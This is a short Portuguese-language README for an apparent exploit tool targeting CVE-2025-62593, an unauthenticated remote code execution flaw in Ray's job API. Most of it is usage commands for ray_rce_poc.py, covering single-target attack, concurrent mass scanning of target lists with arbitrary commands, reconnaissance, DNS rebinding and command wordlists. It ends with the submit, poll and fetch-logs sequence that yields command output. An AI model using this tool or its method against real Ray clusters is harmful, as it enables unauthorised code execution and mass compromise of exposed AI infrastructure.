
CVE-2025-62593 — Exploit de RCE não autenticado no Ray é uma vulnerabilidade de execução remota de código não autenticada no mecanismo de computação distribuída de IA Ray.
CVE-2025-62593 é uma vulnerabilidade de execução remota de código não autenticada
no mecanismo de computação distribuída de IA Ray. A causa raiz é a ausência de
autenticação em endpoints HTTP críticos (/api/jobs, /api/job_agent/jobs).
Um atacante pode submeter um Job do Ray cujo entrypoint é um comando arbitrário,
executando-o no nó head do cluster.
# Alvo único
python3 ray_rce_poc.py --target http://HOST:8265
# Varredura em massa (10 concorrentes)
python3 ray_rce_poc.py --targets list.txt --command "id" -o results.json
# Modo reconhecimento (enumeração rápida)
python3 ray_rce_poc.py --recon --targets list.txt
# Modo DNS rebinding
python3 ray_rce_poc.py --dns-rebind --target http://HOST:8265 --rebind-host 10.0.0.1
# Varredura com wordlist
python3 ray_rce_poc.py --targets list.txt --wordlist commands.txt -o results.csv
/api/jobs/ com entrypoint executando o comando alvo/api/jobs/ até o job atingir estado terminal/api/jobs/{id}/logs para obter a saída